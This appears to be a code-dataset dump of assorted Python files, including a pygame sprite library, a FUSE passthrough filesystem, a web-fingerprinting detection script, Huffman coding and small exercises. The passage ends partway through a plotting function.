seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
73648313937 | def lukuLaskeminen(luvut):
laskuTulos = 0
for luku in luvut:
laskuTulos += luku
return laskuTulos
lista = []
laskemaan = False
while laskemaan != True:
uusiLuku = int(input("Anna kokonaisluku: "))
print("Listaan lisätty uusi luku, jos annoit 0 luvun lista lasketaan läpi.")
lista.append(uusiLuku)
if uusiLuku == 0:
laskemaan = True
tulos = lukuLaskeminen(lista)
print(f"Listan lukujen summa on {tulos}")
| Xanp0/NoelS_Ohjelmisto1 | moduuli_06/teht4_ListaKokonaislukuja.py | teht4_ListaKokonaislukuja.py | py | 456 | python | fi | code | 0 | github-code | 13 |
37562347758 | # The sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.
# Find the sum of all the primes below two million.
import math
def prime_finder(x):
if x == 1:
return False,int(x)
elif x == 2:
return True,int(x)
else:
for i in range(2,int(math.sqrt(x)+1)):
if (x%i == 0):
return False,int(x)
break
return True,int(x)
total = 0
for i in range(1,2000000):
if(prime_finder(i)[0]):
total += prime_finder(i)[1]
print(total)
| mertsengil/Project_Euler_with_Python | Problem_10.py | Problem_10.py | py | 592 | python | en | code | 0 | github-code | 13 |
1114757556 | import pygame, random
from Globals import WINDOWWIDTH, WINDOWHEIGHT
class Sprite:
sprites = []
def __init__(self,
parent,
coordinates: tuple,
scale: float,
randscale: tuple,
ticker: int = 0,
sprite_n: int = 0,
random_sprite: bool = False
):
# Работа с масштабированием
self.scale = scale if scale else 1
if randscale:
self.scale *= random.randint(*randscale) / 100
self.scale = round(self.scale, 2)
if random_sprite:
sprite_n = random.randint(0, self.sprites_len()-1)
size = [dem * self.scale for dem in self.get_sprite(sprite_n).get_size()]
self.parent = parent
self.__rect = pygame.Rect(coordinates, size)
self.sprite = pygame.transform.scale(self.get_sprite(sprite_n), size)
self.base_value = ticker
self.ticker = 0
@property
def rect(self):
return self.__rect
@classmethod
def set_sprites(cls, dir: str, n=1):
cls.sprites = [(pygame.image.load(f'{dir[:-5]}{i}{dir[-4:]}')) for i in range(n)]
@classmethod
def get_sprite(cls, n=0):
return cls.sprites[n]
@classmethod
def resize_sprites(cls, x_y: tuple = (1, 1), scale=None):
for i in range(len(cls.sprites)):
if scale:
cls.sprites[i] = pygame.transform.scale(cls.sprites[i],
(cls.sprites[i].get_width()*scale,
cls.sprites[i].get_height()*scale))
else:
cls.sprites[i] = pygame.transform.scale(cls.sprites[i], x_y)
@classmethod
def sprites_len(cls):
return len(cls.sprites)
def blit_sprite(self):
self.parent.blit(self.sprite, self.rect)
return False
def get_ticker(self):
if self.ticker == 0:
self.ticker = self.base_value
return True
self.ticker -= 1
return False
class MovingSprite(Sprite):
def __init__(self,
parent,
coordinates: tuple = (0, 0),
scale: float = None,
randscale: tuple = None,
ticker: int = 0,
sprite_n: int = 0,
random_sprite: bool = False,
speed_y: float = 0,
speed_x: float = 0,
random_speed: list = None,
outher: str = '',
random_pos: str = '',
cyclic_move: bool = False
):
super().__init__(parent, coordinates, scale, randscale, ticker, sprite_n, random_sprite)
self.speed_y = speed_y
self.speed_x = speed_x
self.cyclic_move = cyclic_move
if random_speed: self.__random_speed(random_speed)
if outher: self.__outher(outher)
if random_pos: self.__random_pos(random_pos)
def __random_speed(self, random_speed):
if 'x' in random_speed[0]:
self.speed_x = random.randint(*random_speed[1])
if 'y' in random_speed[0]:
self.speed_y = random.randint(*random_speed[1])
def __outher(self, outher):
if 'n' in outher:
self.rect.bottom = 0
if 's' in outher:
self.rect.top = WINDOWHEIGHT
if 'w' in outher:
self.rect.right = 0
if 'e' in outher:
self.rect.left = WINDOWWIDTH
def __random_pos(self, random_pos):
if 'x' in random_pos:
self.rect.left = random.randint(-int(self.rect.width) // 2, WINDOWWIDTH - int(self.rect.width) // 2)
if 'y' in random_pos:
self.rect.top = random.randint(-int(self.rect.height) // 2, WINDOWHEIGHT - int(self.rect.height) // 2)
@property
def speed(self):
return self.speed_x, self.speed_y
def move_sprite(self, move=None):
if move:
self.rect.move_ip(*move)
else:
self.rect.move_ip(*self.speed)
if not self.cyclic_move:
if self.rect.bottom < 0 or \
self.rect.top > WINDOWHEIGHT or \
self.rect.right < 0 or \
self.rect.left > WINDOWWIDTH:
return True
return False
class AnimatedSprite(Sprite):
def __init__(self,
parent,
coordinates: tuple = (0, 0),
scale: float = None,
randscale: tuple = None,
ticker: int = 0,
sprite_n: int = 0,
random_sprite: bool = False,
frame: int = 0,
start_frame: int = 0,
cyclic: bool = False,
trigger: bool = True,
sfx: bool = False
):
if start_frame:
sprite_n = start_frame
frame = start_frame
super().__init__(parent, coordinates, scale, randscale, ticker, sprite_n, random_sprite)
self.frame = frame
self.start_frame = start_frame
self.cyclic = cyclic
self.trigger = trigger
self.sfx = sfx
def get_frame(self):
self.sprite = (self.get_sprite(self.frame))
if self.scale != 1:
self.sprite = pygame.transform.scale(self.sprite,
(self.sprite.get_width() * self.scale,
self.sprite.get_height() * self.scale))
def next_frame(self):
if self.frame + 1 < self.sprites_len():
self.frame += 1
elif self.cyclic:
self.frame = self.start_frame
elif not self.sfx:
return False
else:
return True
self.get_frame()
return False
def prev_frame(self):
if self.frame - 1 >= 0:
self.frame -= 1
elif self.cyclic:
self.frame = self.sprites_len()
elif not self.sfx:
return False
else:
return True
self.get_frame()
return False
def blit_sprite(self):
if self.get_ticker():
if self.cyclic or self.sfx:
if self.next_frame():
return True
self.parent.blit(self.sprite, self.rect)
return False
class StickerMixin:
def init_sticker(self, owner: Sprite, point):
self.owner = owner.rect
self.owner_point = point
def move_sprite(self):
if self.owner_point == 'center':
self.rect.center = self.owner.center
if self.owner_point == 'midtop':
self.rect.center = self.owner.midtop
class CollisionMixin:
def collision_object(self, obj):
return self.rect.colliderect(obj.rect)
def collision_check(self, obj_list):
for obj in obj_list:
if self.rect.colliderect(obj.rect):
return obj
return None
class SoundMixin:
sounds = []
@classmethod
def set_sound(cls, dir: str, n=1):
cls.sounds = [(pygame.mixer.Sound(f'{dir[:-5]}{i}{dir[-4:]}')) for i in range(n)]
@classmethod
def get_sound(cls, n=0):
return cls.sounds[n]
def play_sound(self, n=0):
self.get_sound(n).play()
class HPMixin:
def init_hp(self, hp=None):
if hp:
self.hp = hp
else:
self.hp = self.scale
def get_hit(self, damage=1):
self.hp -= damage
if self.hp > 0:
return False
return True
if __name__ == '__main__':
pass
| TheoDaizer/Fiy_me_to_the_Moon | BaseObjects.py | BaseObjects.py | py | 7,702 | python | en | code | 0 | github-code | 13 |
72512467218 | import sqlite3 as lite
# Conecta con la base de datos que origina OpenWPM como resultado
wpm_db = "crawl-data.sqlite"
conn = lite.connect(wpm_db)
cur = conn.cursor()
# Define los valores que permiten comprobar las condiciones de fingerprinting por objetos informativos de JS
info_ob= ["window.navigator.appCodeName", "window.navigator.appName", "window.navigator.appVersion", "window.navigator.buildID", "window.navigator.cookieEnabled", "window.navigator.doNotTrack", "window.navigator.geolocation", "window.navigator.language", "window.navigator.languages", "window.navigator.onLine", "window.navigator.oscpu", "window.navigator.platform", "window.navigator.product", "window.navigator.productSub", "window.navigator.userAgent", "window.navigator.vendorSub", "window.navigator.vendor", "window.screen.pixelDepth", "window.screen.colorDepth"]
navplug= "window.navigator.plugins"
navmim= "window.navigator.mimeTypes"
ver_info_1 = set()
ver_info_2 = set()
info_sites_1 = set()
info_sites_2 = set()
info_sites = set()
# Busca en la base de datos, verificando los sitios donde se cumplen las dos condiciones fingerprinting por objetos informativos de JS
for url, symbol, op, val, arg, top_url in cur.execute("SELECT distinct j.script_url, j.symbol, j.operation, j.value, j.arguments, v.site_url FROM javascript as j JOIN site_visits as v ON j.visit_id = v.visit_id WHERE j.symbol LIKE '%window%' ORDER BY v.site_url;"):
if navplug in symbol:
ver_info_1.add(url + symbol)
if (sum((url + symbol) in s for s in ver_info_1)) > 5:
info_sites_1.add(top_url + ' ' + url)
elif navmim in symbol:
ver_info_1.add(url + symbol)
if (sum((url + symbol) in s for s in ver_info_1)) > 3:
info_sites_1.add(top_url + ' ' + url)
if symbol in info_ob:
ver_info_2.add(url + symbol)
if (sum((url) in s for s in ver_info_2)) > 15:
info_sites_2.add(top_url + ' ' + url)
# Agrupa los sitios que cumplen las condiciones del fingerprinting por objetos informativos de JS (Interseccion en un solo set)
info_sites = info_sites_1 | info_sites_2
# Muestra los resultados
#print(1, info_sites_1)
#print("\n".join(info_sites_2))
print("\n".join(info_sites))
| jdanml/Web-Fingerprinting-Detection-Tool | Scripts/script_informativeJS_RC_v3.py | script_informativeJS_RC_v3.py | py | 2,156 | python | en | code | 0 | github-code | 13 |
21104602164 | from django.conf.urls import patterns, include, url
from django.conf import settings
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
#Sessions
url(r'^accounts/', include('allauth.urls')),
#il8n
(r'^i18n/', include('django.conf.urls.i18n')),
url(r'^', include('common.urls')),
)
| AryGit/arytest | arytest/urls.py | urls.py | py | 399 | python | en | code | 0 | github-code | 13 |
70234340497 | """
This script is a leet speak convertissor.
It takes a string and it returns the string written in leet speak.
"""
def permutation(letter):
"""Function that transforms letter in leet speak equivalent"""
if letter == "a":
new_letter = "4"
elif letter == "b":
new_letter = "8"
elif letter == "e":
new_letter = "3"
elif letter == "l":
new_letter = "1"
elif letter == "o":
new_letter = "0"
elif letter == "g":
new_letter = "6"
elif letter == "s":
new_letter = "5"
elif letter == "t":
new_letter = "7"
else:
new_letter = "2"
return new_letter
def convertissor(text):
"""Function that converts a string in leet speak"""
message_lt = ""
for letter in text:
if letter.lower() in ["a", "b", "e", "g", "l", "o", "s", "t", "z"]:
new_letter = permutation(letter.lower())
message_lt += new_letter
else:
message_lt += letter
return message_lt
message = input("""Enter text to convert : """)
leet_speak_message = convertissor(message)
print(leet_speak_message)
| AlexBardDev/Funny_Python | leet_speak_convertissor.py | leet_speak_convertissor.py | py | 1,188 | python | en | code | 0 | github-code | 13 |
70436968979 | ## Website:: Interviewbit
## Link:: https://www.interviewbit.com/problems/redundant-braces/
## Topic:: Stacks
## Sub-topic:: Simple
## Difficulty:: Medium
## Approach::
## Time complexity:: O(N)
## Space complexity:: O(N)
## Notes::
class Solution:
# @param A : string
# @return an integer
def braces(self, A):
l = len(A)
if l == 0: return 0
st = []
lastpopped = None
for ix, a in enumerate(A):
if a != ')':
st.append(a)
continue
# print(st)
l_exp = 0
while len(st) > 0 and st[-1] != '(':
lastpopped = st.pop()
l_exp += 1
# print(st)
if lastpopped == '(' or l_exp < 2:
return 1
lastpopped = st.pop()
return 0
| anujkhare/algorithms | solutions/Stacks and queues/RedundantBraces.py | RedundantBraces.py | py | 836 | python | en | code | 1 | github-code | 13 |
5174083226 |
from __future__ import with_statement
import argparse
from functools import wraps
import os
import sys
import errno
import logging
from fuse import FUSE, FuseOSError, Operations
import inspect
log = logging.getLogger(__name__)
def logged(f):
@wraps(f)
def wrapped(*args, **kwargs):
log.info('%s(%s)', f.__name__, ','.join(
[str(item) for item in args[1:]]))
return f(*args, **kwargs)
return wrapped
# Path to the file you want to return regardless of the requested filename
target_file_path = "/home/user/lmao.txt"
# regex for getting everything between """
# regex = re.compile(r'"""(.*?)"""', re.DOTALL)
class Passthrough(Operations):
"""A simple passthrough interface.
Initialize the filesystem. This function can often be left unimplemented, but
it can be a handy way to perform one-time setup such as allocating
variable-sized data structures or initializing a new filesystem. The
fuse_conn_info structure gives information about what features are supported
by FUSE, and can be used to request certain capabilities (see below for more
information). The return value of this function is available to all file
operations in the private_data field of fuse_context. It is also passed as a
parameter to the destroy() method.
"""
def __init__(self, source):
self.source = source
def destroy(self, path):
"""Clean up any resources used by the filesystem.
Called when the filesystem exits.
"""
pass
def _full_path(self, partial):
"""Calculate full path for the mounted file system.
.. note::
This isn't the same as the full path for the underlying file system.
As such, you can't use os.path.abspath to calculate this, as that
won't be relative to the mount point root.
"""
if partial.startswith("/"):
partial = partial[1:]
path = os.path.join(self.source, partial)
return path
@logged
def access(self, path, mode):
print("#### access", path, mode)
"""Access a file.
This is the same as the access(2) system call. It returns -ENOENT if
the path doesn't exist, -EACCESS if the requested permission isn't
available, or 0 for success. Note that it can be called on files,
directories, or any other object that appears in the filesystem. This
call is not required but is highly recommended.
"""
full_path = self._full_path(path)
if not os.access(full_path, mode):
raise FuseOSError(errno.EACCES)
@logged
def get_lstat_for_path(self, path):
full_path = self._full_path(path)
st = os.lstat(full_path)
return dict((key, getattr(st, key)) for key in ('st_atime', 'st_ctime',
'st_gid', 'st_mode', 'st_mtime', 'st_nlink', 'st_size', 'st_uid'))
@logged
def match_tag(self, path):
# this is a router that will search for a file that has the tag in its name, and will return the file that most closely matches the tag
if ("art:" in path):
print("art: found")
# try to split by , and if it fails, then take anything after the comma
try:
tags = path.split("/art:")[1].split(",")
except:
tags = [path.split("/art:")[1]]
print("tags:", tags)
possible_files = os.listdir(self.source)
for file in possible_files:
if all(tag in file for tag in tags):
path = file
return path
@logged
def getattr(self, path, fh=None):
print("#### getattr", path, fh)
# if you just look in the directory, its fine
# if you get something that starts with degruchy_, then check what the rest of the filename is
# if the filename contains a , then we need to look and see if any images in the directory contain a _
# if they do, then we need to split the filename by , and split the directory listing by _
# then do a match between each of the split parts and the images in the directory
# we then return whichever matches most closely
path = self.match_tag(path)
return self.get_lstat_for_path(path)
"""Return file attributes.
The "stat" structure is described in detail in the stat(2) manual page.
For the given pathname, this should fill in the elements of the "stat"
structure. If a field is meaningless or semi-meaningless (e.g., st_ino)
then it should be set to 0 or given a "reasonable" value. This call is
pretty much required for a usable filesystem.
"""
@ logged
def readdir(self, path, fh):
print("#### readdir", path, fh)
"""Read a directory.
Return one or more directory entries (struct dirent) to the caller.
This is one of the most complex FUSE functions. It is related to, but
not identical to, the readdir(2) and getdents(2) system calls, and the
readdir(3) library function. Because of its complexity, it is described
separately below. Required for essentially any filesystem, since it's
what makes ls and a whole bunch of other things work.
"""
full_path = self._full_path(path)
dirents = ['.', '..']
if os.path.isdir(full_path):
dirents.extend(os.listdir(full_path))
for r in dirents:
yield r
@ logged
def statfs(self, path):
print("#### statfs", path)
full_path = self._full_path(path)
stv = os.statvfs(full_path)
return dict((key, getattr(stv, key)) for key in ('f_bavail', 'f_bfree',
'f_blocks', 'f_bsize', 'f_favail', 'f_ffree', 'f_files', 'f_flag',
'f_frsize', 'f_namemax'))
@ logged
def open(self, path, flags):
print("#### open", path, flags)
path = self.match_tag(path)
"""Open a file.
Open a file. If you aren't using file handles, this function should
just check for existence and permissions and return either success or
an error code. If you use file handles, you should also allocate any
necessary structures and set fi->fh. In addition, fi has some other
fields that an advanced filesystem might find useful; see the structure
definition in fuse_common.h for very brief commentary.
"""
full_path = self._full_path(path)
return os.open(full_path, flags)
@ logged
def read(self, path, length, offset, fh):
print("#### read", path, length, offset, fh)
"""Read from a file.
Read size bytes from the given file into the buffer buf, beginning
offset bytes into the file. See read(2) for full details. Returns the
number of bytes transferred, or 0 if offset was at or beyond the end of
the file. Required for any sensible filesystem.
"""
os.lseek(fh, offset, os.SEEK_SET)
return os.read(fh, length)
@ logged
def flush(self, path, fh):
print("#### flush", path, fh)
"""Flush buffered information.
Called on each close so that the filesystem has a chance to report
delayed errors. Important: there may be more than one flush call for
each open. Note: There is no guarantee that flush will ever be called
at all!
"""
return os.fsync(fh)
@ logged
def release(self, path, fh):
print("#### release", path, fh)
"""Release is called when FUSE is done with a file.
This is the only FUSE function that doesn't have a directly
corresponding system call, although close(2) is related. Release is
called when FUSE is completely done with a file; at that point, you can
free up any temporarily allocated data structures. The IBM document
claims that there is exactly one release per open, but I don't know if
that is true.
"""
return os.close(fh)
if __name__ == '__main__':
# add arguments as optional, with a default
parser = argparse.ArgumentParser()
parser.add_argument("mountpoint", help="the mountpoint where the files will be available",
default='mountpoint/', nargs='?')
# optional argument
parser.add_argument("source", help="the source directory where the files will be taken from",
default='source_folder/', nargs='?')
args = parser.parse_args()
print("starting")
print("mountpoint", args.mountpoint)
print("source", args.source)
FUSE(Passthrough(source=args.source),
args.mountpoint, foreground=True)
| claydegruchy/vtt-image-tag | custom_fs.py | custom_fs.py | py | 8,907 | python | en | code | 0 | github-code | 13 |
3454987611 | from datetime import datetime
import pandas as pd
from privacy.base import suppress_only
from privacy.bayardo import BayardoAnonymizer
class BayardoExtendedAnonymizer:
"""
Optimal k-Anonymity [Bayardo et al.] to generate fairness
"""
def __init__(self, df, quasi_identifier, grouping_keys, use_suppression, use_generalization):
"""
:param df:
:param quasi_identifier: QI for the anonymization (Bayardo)
:param grouping_keys: Grouping for each anonymizer (can be empty)
:param use_suppression:
:param use_generalization:
"""
# Small integrity checks
if set(quasi_identifier).intersection(grouping_keys):
raise ValueError("QI and grouping key must be disjoint.")
# Save parameters
self.df = df
self.quasi_identifier = sorted(quasi_identifier)
self.grouping_keys = sorted(grouping_keys)
self.use_suppression = use_suppression
self.use_generalization = use_generalization
self.suppression_qi = self.quasi_identifier + self.grouping_keys
# Prepare
self.size = len(df.index)
self.duration = None
if self.grouping_keys:
groups = self.df.groupby(self.grouping_keys).groups
self._df_groups = [self.df.iloc[g_idx] for _, g_idx in groups.items()]
else:
self._df_groups = [self.df]
# State
self._anonymizers = [
BayardoAnonymizer(df_slice, self.quasi_identifier, use_suppression=use_suppression) for df_slice in
self._df_groups]
# Print INFO
print("INFO: Initialized {} groups".format(len(self._df_groups)))
print("INFO: k_max = {}".format(self.k_max))
if use_generalization:
print("INFO: Using generalization")
if use_suppression:
print("INFO: Using suppression")
for idx, a in enumerate(self._anonymizers):
print("DEBUG: Anonymizer {}: {} tuples, {} domain values".format(idx + 1, a.size, len(a.dom_values)))
@property
def _suppression_only(self):
return self.use_suppression and not self.use_generalization
@property
def k_max(self):
if self.grouping_keys and self.use_generalization:
return int(self.df.groupby(self.grouping_keys).count().min().min())
elif self._suppression_only:
return int(self.df.groupby(self.suppression_qi).count().max().min())
else:
return int(self.size)
@property
def best_cost(self):
if self._suppression_only:
return -1
else:
return sum(a.best_cost for a in self._anonymizers)
def generate_output(self):
frames = [a.anonymized_df for a in self._anonymizers]
return pd.concat(frames)
def run(self, k):
# Integrity checks
if not 1 <= k <= self.k_max:
raise ValueError("k must be from [1, {}]".format(self.k_max))
start = datetime.now()
if self._suppression_only:
print("INFO: Anonymizing ... ", end="", flush=True)
df = suppress_only(self.df, k, self.suppression_qi)
print("done", flush=True)
self.duration = datetime.now() - start
else:
print("INFO: Anonymizing ... {:.2%}".format(0), end="", flush=True)
for idx, anonymizer in enumerate(self._anonymizers):
anonymizer.run(k)
print("\rINFO: Anonymizing ... {:.2%}".format((idx + 1.0) / len(self._anonymizers)), end="", flush=True)
print("")
self.duration = datetime.now() - start
df = self.generate_output()
print("INFO: Finished in {}".format(self.duration))
return df
| johnruth96/privacy-justifiable-fairness | privacy/bayardoext.py | bayardoext.py | py | 3,771 | python | en | code | 0 | github-code | 13 |
37313915498 | from django.urls import path
from users.views import (
DepositView,
UserCreateView,
UserDetailView,
UserLoginView,
UserLogoutView
)
urlpatterns = [
path('login', UserLoginView.as_view(), name='login'),
path('logout', UserLogoutView.as_view(), name='logout'),
path('register', UserCreateView.as_view(), name='user_create'),
path('<int:pk>', UserDetailView.as_view(), name='user_detail'),
path('<int:pk>/deposit', DepositView.as_view(), name='deposit'),
]
| coldwhiskeyman/fry_shop | users/urls.py | urls.py | py | 497 | python | en | code | 0 | github-code | 13 |
13514006086 | from ebcli.core import fileoperations, io
from ebcli.core.abstractcontroller import AbstractBaseController
from ebcli.operations import platformops, platform_version_ops
from ebcli.resources.strings import strings, flag_text, prompts
class GenericPlatformDeleteController(AbstractBaseController):
class Meta:
is_platform_workspace_only_command = True
requires_directory_initialization = True
description = strings['platformdeleteversion.info']
arguments = [
(
['version'],
dict(
action='store',
help=flag_text['platformdeleteversion.version'],
nargs='?',
default=None
)
),
(
['--cleanup'],
dict(
action='store_true',
help=flag_text['platformdelete.cleanup']
)
),
(
['--all-platforms'],
dict(
action='store_true',
help=flag_text['platformdelete.allplatforms']
)
),
(
['--force'],
dict(
action='store_true',
help=flag_text['platformdelete.force']
)
)
]
epilog = strings['platformdeleteversion.epilog']
@classmethod
def clone(cls):
return type('Meta', cls.__bases__, dict(cls.__dict__))
def do_command(self):
version = self.app.pargs.version
cleanup = self.app.pargs.cleanup
force = self.app.pargs.force
if cleanup:
self.cleanup_platforms()
else:
if version:
platform_version_ops.delete_platform_version(version, force)
else:
self.app.args.print_help()
def cleanup_platforms(self):
force = self.app.pargs.force
all_platforms = self.app.pargs.all_platforms
if all_platforms:
platform_name = None
else:
platform_name = fileoperations.get_platform_name()
failed_versions = sorted(
platform_version_ops.list_custom_platform_versions(
platform_name=platform_name,
status='Failed',
)
)
if failed_versions:
if not force:
if not platform_name:
io.echo(prompts['cleanupplatform.confirm'].replace('{platform-name}', 'All Platforms'))
for failed_version in failed_versions:
io.echo(failed_version)
io.validate_action(prompts['cleanupplatform.validate-all'], 'all')
else:
io.echo(prompts['cleanupplatform.confirm'].replace('{platform-name}', platform_name))
io.validate_action(prompts['cleanupplatform.validate'], platform_name)
for failed_version in failed_versions:
platform_version_ops.delete_platform_version(failed_version, force=True)
class PlatformDeleteController(GenericPlatformDeleteController):
Meta = GenericPlatformDeleteController.Meta.clone()
Meta.label = 'platform delete'
Meta.aliases = ['delete']
Meta.aliases_only = True
Meta.stacked_on = 'platform'
Meta.stacked_type = 'nested'
Meta.usage = 'eb platform delete <version> [options...]'
class EBPDeleteController(GenericPlatformDeleteController):
Meta = GenericPlatformDeleteController.Meta.clone()
Meta.label = 'delete'
Meta.usage = 'ebp delete <version> [options...]'
| aws/aws-elastic-beanstalk-cli | ebcli/controllers/platform/delete.py | delete.py | py | 3,695 | python | en | code | 150 | github-code | 13 |
23905384621 | #!/usr/bin/env python3
"""1-rnn.py"""
import numpy as np
def rnn(rnn_cell, X, h_0):
"""function that performs forward propagation for the RNN"""
t = X.shape[0]
m = X.shape[1]
h = h_0.shape[1]
H = np.zeros((t + 1, m, h))
Y = np.zeros((t, m, rnn_cell.Wy.shape[1]))
for i in range(t):
if i == 0:
H[i] = h_0
H[i + 1], Y[i] = rnn_cell.forward(H[i], X[i])
return H, Y
| diego0096/holbertonschool-machine_learning | supervised_learning/0x0D-RNNs/1-rnn.py | 1-rnn.py | py | 426 | python | en | code | 0 | github-code | 13 |
73498366417 | script_select_todos_idiomas = lambda dados = {}: """
SELECT DISTINCT nome from Idiomas;
"""
'''
Requer {
"nome_idioma" : str
}
'''
script_select_idioma_por_nome = lambda dados = {}: """
SELECT nome FROM Idiomas WHERE nome = :nome_idioma
"""
'''
Requer {
"nome_idioma" : str
}
'''
script_select_idioma_por_canal_id = lambda dados = {}: """
SELECT Idiomas.nome
FROM Idiomas
INNER JOIN canais
ON Idiomas.id = Canais.idioma
WHERE canal_id = :canal_id
""" | LeandroLFE/capmon | db/scripts/script_select/select_idiomas.py | select_idiomas.py | py | 492 | python | pt | code | 0 | github-code | 13 |
8641224415 | # Huffman coding is used to reduce the size of the file
import heapq
import os
class BinaryTreeNode:
def __init__(self,value,frequency):
self.value = value
self.frequency = frequency
self.left = None
self.right = None
def __lt__(self,other):
return self.frequency < other.frequency
def __eq__(self,other):
return self.frequency == other.frequency
class HuffmanCoding:
def __init__(self,path):
self.path = path
self.__heap = []
self.__codes = {}
def __make_frequency_dict(self,text):
freq_dict = {}
for char in text:
if char not in freq_dict:
freq_dict[char] = 0
freq_dict[char] += 1
return freq_dict
def __buildheap(self,freq_dict):
for key in freq_dict:
frequency = freq_dict[key]
binary_tree_node = BinaryTreeNode(key,frequency)
heapq.heappush(self.__heap,binary_tree_node)
def __buildTree(self):
while((len(self.__heap))>1):
binary_tree_node_1 = heapq.heappop(self.__heap)
binary_tree_node_2 = heapq.heappop(self.__heap)
freq_sum = binary_tree_node_1.frequency + binary_tree_node_2.frequency
newnode = BinaryTreeNode(None,freq_sum)
newnode.left = binary_tree_node_1
newnode.right = binary_tree_node_2
heapq.heappush(self.__heap,newnode)
return
def buildcodeshelper(self,head,curr_bits):
if head is None:
return
if head.value is not None:
self.__codes[head.value] = curr_bits
return
self.buildcodeshelper(head.left,curr_bits+"0")
self.buildcodeshelper(head.right,curr_bits+"1")
def __buildcodes(self):
head = self.__heap[0]
self.buildcodeshelper(head,"")
def __getEncodedtext(self,text):
encoded_text = ""
for char in text:
encoded_text += self.__codes[char]
return encoded_text
def __getPaddedEncodedText(self,encoded_text):
padded_amount=8-(len(encoded_text)%8)
for i in range(padded_amount):
encoded_text=encoded_text+'0'
padded_info="{0:08b}".format(padded_amount)
padded_encoded_text=padded_info+encoded_text
return padded_encoded_text
def __getBytesArray(self,padded_encoded_text):
array = []
for i in range(0,len(padded_encoded_text),8):
byte = padded_encoded_text[i:i+8]
array.append(int(byte,2))
return array
def compress(self):
# get file from the path
file_name,file_extension = os.path.splitext(self.path)
output_path = file_name + ".bin"
# read text from file
with open(self.path,"r+") as file , open(output_path,"wb") as output:
text = file.read()
text = text.rstrip()
# make frequency dictionary from the text
freq_dict = self.__make_frequency_dict(text)
# construct the heap from the frequency dict
self.__buildheap(freq_dict)
# construct the binary tree from the heap
self.__buildTree()
# construct the codes from the binary tree
self.__buildcodes()
# creating the encoded text using the codes
encoded_text = self.__getEncodedtext(text)
# padded this encoded text first
padded_encoded_text = self.__getPaddedEncodedText(encoded_text)
# put this encoded text into the binary.file
bytes_array = self.__getBytesArray(padded_encoded_text)
final_bytes = bytes(bytes_array)
# return this binary file as output
output.write(final_bytes)
print("compressed!!")
return output_path
path = "/home/saket18/hello.txt" # you can give the path of your file
h = HuffmanCoding(path)
output_path = h.compress() # it will return the path of the output file
| codemistic/General-Projects | Python Basic Project/Huffman coding.py | Huffman coding.py | py | 3,966 | python | en | code | 47 | github-code | 13 |
8525121236 | import os
import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix, classification_report
from .util import *
def tr_plot(tr_data, start_epoch):
# 绘制训练数据和验证数据
tacc = tr_data.history["accuracy"]
tloss = tr_data.history["loss"]
vacc = tr_data.history["val_accuracy"]
vloss = tr_data.history["val_loss"]
# 计算最终迭代了多少次
Epoch_count = len(tacc) + start_epoch
Epochs = [i + 1 for i in range(start_epoch, Epoch_count)]
index_loss = np.argmin(vloss)
val_lowest = vloss[index_loss]
index_acc = np.argmax(vacc)
acc_highest = vacc[index_acc]
sc_label = 'best epoch=' + str(index_loss + 1 + start_epoch)
vc_label = 'best epoch=' + str(index_acc + 1 + start_epoch)
# 创建图表
fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(20, 8))
axes[0].plot(Epochs, tloss, 'r', label='训练损失')
axes[0].plot(Epochs, vloss, 'g', label='验证损失')
axes[0].scatter(index_loss + 1 + start_epoch, val_lowest, s=150, c="blue", label=sc_label)
axes[0].set_title('训练和验证损失')
axes[0].set_xlabel("迭代次数")
axes[0].set_ylabel("损失")
axes[0].legend()
axes[1].plot(Epochs, tacc, 'r', label='训练准确率')
axes[1].plot(Epochs, vacc, 'g', label='验证准确率')
axes[1].scatter(index_acc + 1 + start_epoch, acc_highest, s=150, c='blue', label=val_lowest)
axes[1].set_title("训练和验证损失")
axes[1].set_xlabel("迭代次数")
axes[1].set_ylabel("准确率")
axes[1].legend()
plt.show()
def print_info(test_gen, preds, print_code, save_dir, subject):
"""
:param test_gen: 测试集数据集生成器(其指定了生成方式,通常是指向本地图片库)
:param preds: 预测结果
:param print_code:
:param save_dir: 保存目录
:param subject:
:return:
"""
# 获取类名及下标字典
class_dict = test_gen.class_indices
# 获取所有类名
labels = test_gen.labels
# 获取所有文件名称
file_names = test_gen.filenames
error_list = []
true_class = []
pred_class = []
prob_list = []
# 按下标为key 类名为value创建一个新的字典
new_dict = {}
error_indies = []
# 实际预测值数组
y_pred = []
for key, value in class_dict.items():
new_dict[value] = key
# 将所有类名作为目录存储在save_dir下
classes = list(new_dict.values())
# 记录错误的分类次数
errors = 0
for i, p in enumerate(preds):
# 预测值
pred_index = np.argmax(p)
# 实际值
true_index = labels[i]
# 如果预测错误
if pred_index != true_index:
error_list.append(file_names[i])
true_class.append(new_dict[true_index])
pred_class.append(new_dict[pred_index])
# 预测的最高概率装进prob
prob_list.append(p[pred_index])
error_indies.append(true_index)
errors = errors + 1
y_pred.append(pred_index)
if print_code != 0:
if errors > 0:
if print_code > errors:
r = errors
else:
r = print_code
msg = '{0:^28s}{1:^28s}{2:^28s}{3:^16s}' \
.format('Filename', 'Predicted Class', 'True Class',
'Probability')
print_in_color(msg, (0, 255, 0), (55, 65, 80))
for i in range(r):
# TODO 暂时不知道这几行代码干嘛的
split1 = os.path.split(error_list[i])
split2 = os.path.split(split1[0])
fname = split2[1] + '/' + split1[1]
msg = '{0:^28s}{1:^28s}{2:^28s}{3:4s}{4:^6.4f}'.format(
fname, pred_class[i], true_class[i], ' ',
prob_list[i])
print_in_color(msg, (255, 255, 255), (55, 65, 60))
else:
msg = '精度为100%,没有错误'
print_in_color(msg, (0, 255, 0), (55, 65, 80))
if errors > 0:
plot_bar = []
plot_class = []
for key, value in new_dict.items():
# 获得被错误分类的类型的计数(例如:假设 丹顶鹤的下标是11,则下面的操作将获得实际为丹顶鹤的鸟被错误分类的数量)
count = error_indies.count(key)
if count != 0:
plot_bar.append(count)
plot_class.append(value)
fig = plt.figure()
fig.set_figheight(len(plot_class) / 3)
